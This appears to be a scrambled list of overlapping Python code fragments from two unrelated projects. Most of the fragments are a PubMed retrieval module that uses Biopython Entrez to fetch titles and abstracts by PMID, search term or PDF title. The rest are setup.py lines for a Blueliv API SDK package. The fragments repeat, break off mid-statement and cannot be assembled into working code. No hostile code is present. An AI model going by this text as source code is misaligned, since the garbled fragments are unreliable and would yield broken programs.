pdf_paths_to_titles(pdf_paths, email): titles =", "get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for pmid", "except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle']", "except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title':", "data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import", "doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using", "efetch, read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk", "get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__", "import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document", "docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email =", "title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term,", "passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc", "retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def", "[] docs_not_found = [] try: for file in files: pmid = get_data_from_pdf(file, email)", "dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email =", "{'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article =", "from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found =", "= email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>',", "coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList'])", "retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try:", "def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file)", "def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb')", "pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except:", "commercially available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2) through", "from Bio.Entrez import efetch, read from Bio import Entrez import os import sys", "Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle)", "title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term,", "titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found =", "= article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return", "docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email", "split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else:", "record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths:", "return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try:", "#using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle =", "'t', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'],", "lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a',", "None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words,", "pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key", "docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key =", "email)) return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = []", "idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email):", "import nltk from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import", "docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key", "path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term =", "import Document from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import", "term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None:", "else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return", "import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for", "retmax=1)[0] return pmid except: return None if __name__ == '__main__': # path =", "return titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try:", "if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen,", "data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email", "files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found =", "= pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file,", "remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid,", "sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract']", "email, dl_config): pmids = [] docs_not_found = [] try: for file in files:", "PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed',", "email, dl_config): docs = [] pmids_not_found = [] for pmid in pmids: sentences", "stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation,", "= 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting", "titles def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try: for", "if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen,", "is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs", "'': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if", "import efetch, read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import", "= xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract':", "docs = [] pmids_not_found = [] for pmid in pmids: sentences = []", "Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for", "def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\",", "dl_config): docs = [] pmids_not_found = [] for pmid in pmids: sentences =", "def pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for pmid in" ]
[]
[ "api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data =", "resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def", "def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json", "get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response =", "return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else", "= 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username',", "'Not Available' for col in cols_needed))) for show in shows['data']) def get_image(url): return", "requests import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) #", "None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not", "get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values()", "headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name},", "headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return", "shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview',", "dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col in", "('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from", "= response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep + url, headers=headers).content get_jwt()", "from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for", "200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def", "return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id',", "for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id):", "requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] =", "cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None", "'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from (", "get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json =", "season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep +", "requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json()", "import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api',", "not None else 'Not Available' for col in cols_needed))) for show in shows['data'])", "{} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled():", "headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_", "'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global", "episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep + url,", "if show.get(col) is not None else 'Not Available' for col in cols_needed))) for", "= 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey':", "in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content", "requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return", "= 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt():", "resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username':", "'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200:", "url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return", "'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code ==", "( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col", "requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers", "'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col)", "shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None", "requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite',", "backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers =", "'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col)", "requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired')", "def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ =", "= {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with", "requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com'", "'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is", "= requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization']", "'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers", "json=data) if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer", "'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data", "show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url", "{'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if", "== 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt", "= f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json()", "+ url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list,", "(show.get(col) if show.get(col) is not None else 'Not Available' for col in cols_needed)))", "else 'Not Available' for col in cols_needed))) for show in shows['data']) def get_image(url):", "f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed", "f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count)", "requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt =", "'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed,", "# path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400)", "running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com'", "= f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list,", "headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep", "cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def", "show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'):", "with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt", "= requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url):", "backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep", "= response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series',", "*_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep + url, headers=headers).content", "response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def", "headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'}", "jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows =", "is not None else 'Not Available' for col in cols_needed))) for show in", "'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey':", "return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url,", "search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image',", "'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if", "params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if", "= requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network',", "if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not", "response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt = response.json()['token']", "in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url =", "import requests import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400)", "{jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed =", "shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary'", "data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login',", "<gh_stars>0 import requests import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite',", "'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code", "def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status',", "gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url =", "= {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data)", "if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}'", "= ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield", "Available' for col in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url", "response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return", "from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url", "global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name):", "# requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/'", "when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url =", "headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows", "jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName',", "'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key',", "path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url", "col in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url,", "show.get(col) is not None else 'Not Available' for col in cols_needed))) for show", "None else 'Not Available' for col in cols_needed))) for show in shows['data']) def", "expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep =", "yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available'", "for col in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url +", "expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {}", "def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response", "response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name':", "url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count," ]
[ "Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python", "find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT',", ":: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language ::", "Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language", "from setuptools import setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python',", "classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic ::", "Python :: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime", "Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved ::", "2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7',", "Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python", ":: MIT License', 'Programming Language :: Python :: 2', 'Programming Language :: Python", ":: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python ::", "url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience", "3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4',", "api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'],", "Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language", "author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience ::", "- Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools',", "name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development", ":: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python ::", "Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language", "2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2',", ":: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language ::", "'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming", ":: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python ::", "setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[", "setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>',", ":: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development ::", "3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime servers bot", ":: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime servers", "description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status ::", "for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable',", ":: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language ::", ":: 3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']),", "'Topic :: Software Development :: Build Tools', 'License :: OSI Approved :: MIT", ":: Python :: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api", "'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime servers bot ips", "'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 2',", "5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build", "2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3',", "Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License", "], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <=", ":: OSI Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming", "Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI", "Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python ::", "'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming", "setuptools import setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk',", "keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1',", "3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), 